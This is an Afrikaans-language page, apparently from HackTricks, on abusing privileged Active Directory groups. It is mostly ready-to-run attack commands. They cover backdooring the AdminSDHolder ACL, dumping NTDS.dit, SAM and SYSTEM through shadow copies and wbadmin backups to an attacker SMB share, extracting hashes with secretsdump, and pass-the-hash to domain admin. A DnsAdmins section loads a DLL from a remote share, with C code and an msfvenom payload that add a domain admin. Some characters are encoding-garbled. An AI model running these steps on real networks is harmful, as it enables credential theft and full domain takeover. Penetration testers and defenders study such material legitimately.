Bevoorregte Groepe
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Bekende groepe met administratiewe bevoegdhede
- Administrators
- Domain Admins
- Enterprise Admins
Account Operators
Hierdie groep het die bevoegdheid om rekeninge en groepe te skep wat nie administrateurs op die domein is nie. Daarbenewens laat dit plaaslike aanmelding op die Domain Controller (DC) toe.
Om die lede van hierdie groep te identifiseer, word die volgende opdrag uitgevoer:
Get-NetGroupMember -Identity "Account Operators" -Recurse
Dit is toegelaat om nuwe gebruikers by te voeg, sowel as plaaslike aanmelding op die DC.
AdminSDHolder groep
Die Access Control List (ACL) van die AdminSDHolder groep is van kardinale belang aangesien dit toestemmings stel vir alle âbeskermde groepeâ binne Active Directory, insluitend groepe met hoĂ« voorregte. Hierdie meganisme verseker die veiligheid van hierdie groepe deur ongemagtigde wysigings te voorkom.
ân aanvaller kan hiervan voordeel trek deur die ACL van die AdminSDHolder groep te wysig en ân standaard gebruiker volle regte te gee. Dit sou daardie gebruiker effektief volle beheer oor al die beskermde groepe gee. As hierdie gebruiker se regte gewysig of verwyder word, sal dit weens die stelselontwerp binne ân uur outomaties herstel word.
Kommandoâs om die lede te bekyk en toestemmings te wysig sluit in:
Get-NetGroupMember -Identity "AdminSDHolder" -Recurse
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}
Daar is ân script beskikbaar om die herstelproses te versnel: Invoke-ADSDPropagation.ps1.
Vir meer besonderhede, besoek ired.team.
AD Recycle Bin
Lidmaatskap van hierdie groep laat toe dat verwyderde Active Directory-objekte gelees word, wat sensitiewe inligting kan openbaar:
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
Toegang tot die Domain Controller
Toegang tot lĂȘers op die DC is beperk tensy die gebruiker deel is van die Server Operators-groep, wat die toegangsvlak verander.
Privilege Escalation
Deur PsService of sc van Sysinternals te gebruik, kan ân mens dienspermissies inspekteer en wysig. Die Server Operators-groep het byvoorbeeld volle beheer oor sekere dienste, wat die uitvoering van arbitrĂȘre opdragte en privilege escalation toelaat:
C:\> .\PsService.exe security AppReadiness
Hierdie opdrag openbaar dat Server Operators volle toegang het, wat die manipulering van dienste vir verhoogde regte moontlik maak.
Backup Operators
Lidmaatskap van die Backup Operators-groep verleen toegang tot die DC01 lĂȘerstelsel as gevolg van die SeBackup en SeRestore voorregte. Hierdie voorregte laat toe om deur gidse te navigeer, lyste te genereer en lĂȘers te kopieer, selfs sonder eksplisiete toestemmings, deur die FILE_FLAG_BACKUP_SEMANTICS vlag te gebruik. Die gebruik van spesifieke skripte is nodig vir hierdie proses.
Om groepslede te lys, voer uit:
Get-NetGroupMember -Identity "Backup Operators" -Recurse
Plaaslike Aanval
Om hierdie voorregte plaaslik te benut, word die volgende stappe uitgevoer:
- Importeer die nodige biblioteke:
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
- Aktiveer en verifieer
SeBackupPrivilege:
Set-SeBackupPrivilege
Get-SeBackupPrivilege
- Verkry toegang tot en kopieer lĂȘers uit beperkte gidse, byvoorbeeld:
dir C:\Users\Administrator\
Copy-FileSeBackupPrivilege C:\Users\Administrator\report.pdf c:\temp\x.pdf -Overwrite
AD-aanval
Direkte toegang tot die Domain Controller se lĂȘerstelsel maak die diefstal van die NTDS.dit databasis moontlik, wat alle NTLM-hashes vir domeingebruikers en rekenaars bevat.
Gebruik diskshadow.exe
- Skep ân shadow copy van die
Cdrive:
diskshadow.exe
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
begin backup
add volume C: alias cdrive
create
expose %cdrive% F:
end backup
exit
- Kopieer
NTDS.ditvanaf die shadow copy:
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
Alternatiewelik, gebruik robocopy om lĂȘers te kopieer:
robocopy /B F:\Windows\NTDS .\ntds ntds.dit
- Onttrek
SYSTEMenSAMvir die verkryging van hashes:
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV
- Haal alle hashes uit
NTDS.dit:
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
- Na-uittrekking: Pass-the-Hash na DA
# Use the recovered Administrator NT hash to authenticate without the cleartext password
netexec winrm <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> -x "whoami"
# Or execute via SMB using an exec method
netexec smb <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> --exec-method smbexec -x cmd
Gebruik wbadmin.exe
- Stel ân NTFS-lĂȘerstelsel in vir ân SMB server op die aanvallermasjien en kas SMB-aanmeldbewyse op die teikenmasjien.
- Gebruik
wbadmin.exevir stelsel-rugsteun en die onttrekking vanNTDS.dit:
net use X: \\<AttackIP>\sharename /user:smbuser password
echo "Y" | wbadmin start backup -backuptarget:\\<AttackIP>\sharename -include:c:\windows\ntds
wbadmin get versions
echo "Y" | wbadmin start recovery -version:<date-time> -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
For a practical demonstration, see DEMO VIDEO WITH IPPSEC.
DnsAdmins
Lede van die DnsAdmins groep kan hul voorregte misbruik om ân arbitrĂȘre DLL met SYSTEM-voorregte op ân DNS-bediener te laai, wat dikwels op Domain Controllers gehuisves word. Hierdie vermoĂ« bied aansienlike eksploitasiemoontlikhede.
Om lede van die DnsAdmins groep te lys, gebruik:
Get-NetGroupMember -Identity "DnsAdmins" -Recurse
Voer willekeurige DLL uit (CVEâ2021â40469)
Note
Hierdie kwesbaarheid maak die uitvoering van willekeurige kode met SYSTEM-bevoegdhede in die DNS-diens moontlik (gewoonlik binne die DCs). Hierdie probleem is in 2021 opgelos.
Lede kan die DNS-bediener ân willekeurige DLL laat laai (hetsy plaaslik of vanaf ân afgeleĂ« share) deur opdragte soos:
dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.dll
dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll
An attacker could modify the DLL to add a user to the Domain Admins group or execute other commands with SYSTEM privileges. Example DLL modification and msfvenom usage:
# If dnscmd is not installed run from aprivileged PowerShell session:
Install-WindowsFeature -Name RSAT-DNS-Server -IncludeManagementTools
// Modify DLL to add user
DWORD WINAPI DnsPluginInitialize(PVOID pDnsAllocateFunction, PVOID pDnsFreeFunction)
{
system("C:\\Windows\\System32\\net.exe user Hacker T0T4llyrAndOm... /add /domain");
system("C:\\Windows\\System32\\net.exe group \"Domain Admins\" Hacker /add /domain");
}
// Generate DLL with msfvenom
msfvenom -p windows/x64/exec cmd='net group "domain admins" <username> /add /domain' -f dll -o adduser.dll
Om die DNS-diens te herbegin (wat addisionele toestemmings mag vereis) is nodig sodat die DLL gelaai kan word:
sc.exe \\dc01 stop dns
sc.exe \\dc01 start dns
Vir meer besonderhede oor hierdie aanvalvektor, verwys na ired.team.
Mimilib.dll
Dit is ook moontlik om mimilib.dll te gebruik vir opdraguitvoering, deur dit te wysig om spesifieke opdragte of reverse shells uit te voer. Kyk na hierdie pos vir meer inligting.
WPAD-rekord vir MitM
DnsAdmins kan DNS-rekords manipuleer om Man-in-the-Middle (MitM)-aanvalle uit te voer deur ân WPAD-rekord te skep nadat die globale query-bloklys gedeaktiveer is. Gereedskap soos Responder of Inveigh kan gebruik word vir spoofing en om netwerkverkeer vas te vang.
Gebeurtenisloglesers
Lede kan toegang tot gebeurtenislogboeke kry en moontlik sensitiewe inligting vind, soos wagwoorde in platteks of besonderhede oor opdraguitvoering:
# Get members and search logs for sensitive information
Get-NetGroupMember -Identity "Event Log Readers" -Recurse
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}
Exchange Windows Permissions
Hierdie groep kan DACLs op die domain object wysig, wat moontlik DCSync privileges kan verleen. Tegnieke vir privilege escalation wat hierdie groep uitbuit, word in die Exchange-AD-Privesc GitHub repo uiteengesit.
# List members
Get-NetGroupMember -Identity "Exchange Windows Permissions" -Recurse
Hyper-V Administrators
Hyper-V Administrators het volle toegang tot Hyper-V, wat misbruik kan word om beheer oor gevirtualiseerde Domain Controllers te verkry. Dit sluit in die kloon van lewende DCs en die onttrekking van NTLM-hashes uit die NTDS.dit-lĂȘer.
Exploitation Example
Firefoxâs Mozilla Maintenance Service kan deur Hyper-V Administrators uitgebuit word om opdragte as SYSTEM uit te voer. Dit behels die skep van ân hard link na ân beskermde SYSTEM-lĂȘer en dit te vervang met ân kwaadwillige uitvoerbare lĂȘer:
# Take ownership and start the service
takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
sc.exe start MozillaMaintenance
Nota: Hard link exploitation is in onlangse Windows-opdaterings gemitigeer.
Group Policy Creators Owners
Hierdie groep laat lede toe om Group Policies in die domein te skep. Hulle lede kan egter nie Group Policies op gebruikers of groepe toepas nie, of bestaande GPOs wysig.
Organization Management
In omgewings waar Microsoft Exchange ontplooi is, het ân spesiale groep bekend as Organization Management betekenisvolle bevoegdhede. Hierdie groep het die voorreg om toegang tot die posbusse van alle domeingebruikers te kry en behou volledige beheer oor die âMicrosoft Exchange Security Groupsâ Organizational Unit (OU). Hierdie beheer sluit die Exchange Windows Permissions groep in, wat uitgebuit kan word vir privilege escalation.
Privilege Exploitation and Commands
Print Operators
Lede van die Print Operators groep beskik oor verskeie voorregte, insluitend die SeLoadDriverPrivilege, wat hulle toelaat om lokaal aan te meld op ân Domain Controllerâ, dit af te skakel, en drukkers te bestuur. Om hierdie voorregte te benut, veral as SeLoadDriverPrivilege nie in ân nie-verhoogde konteks sigbaar is nie, is dit nodig om User Account Control (UAC) te omseil.
Om die lede van hierdie groep te lys, word die volgende PowerShell-opdrag gebruik:
Get-NetGroupMember -Identity "Print Operators" -Recurse
Vir meer gedetailleerde uitbuitingsmetodes verwant aan SeLoadDriverPrivilege, behoort mens spesifieke sekuriteitsbronne te raadpleeg.
Remote Desktop Users
Lede van hierdie groep kry toegang tot rekenaars via Remote Desktop Protocol (RDP). Om hierdie lede te lys, is daar PowerShell-opdragte beskikbaar:
Get-NetGroupMember -Identity "Remote Desktop Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Desktop Users"
Verder insigte oor die uitbuiting van RDP kan in toegewyde pentesting-hulpbronne gevind word.
Gebruikers vir afstandsbestuur
Lede kan toegang tot rekenaars kry via Windows Remote Management (WinRM). Enumeration van hierdie lede word bereik deur:
Get-NetGroupMember -Identity "Remote Management Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Management Users"
Vir eksplorasietegnieke verwant aan WinRM, moet spesifieke dokumentasie geraadpleeg word.
Bediener-operateurs
Hierdie groep het toestemming om verskeie konfigurasies op Domeincontrollers uit te voer, insluitend rugsteun- en herstelbevoegdhede, om die stelseltyd te verander en om die stelsel af te skakel. Om die lede te lys, is die opdrag wat gegee word:
Get-NetGroupMember -Identity "Server Operators" -Recurse
Verwysings
- https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges
- https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
- https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-bâprivileged-accounts-and-groups-in-active-directory
- https://docs.microsoft.com/en-us/windows/desktop/secauthz/enabling-and-disabling-privileges-in-câ
- https://adsecurity.org/?p=3658
- http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
- https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
- https://rastamouse.me/2019/01/gpo-abuse-part-1/
- https://github.com/killswitch-GUI/HotLoad-Driver/blob/master/NtLoadDriver/EXE/NtLoadDriver-C%2B%2B/ntloaddriver.cpp#L13
- https://github.com/tandasat/ExploitCapcom
- https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp
- https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
- https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e
- https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html
- HTB: Baby â Anonymous LDAP â Password Spray â SeBackupPrivilege â Domain Admin
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
HackTricks

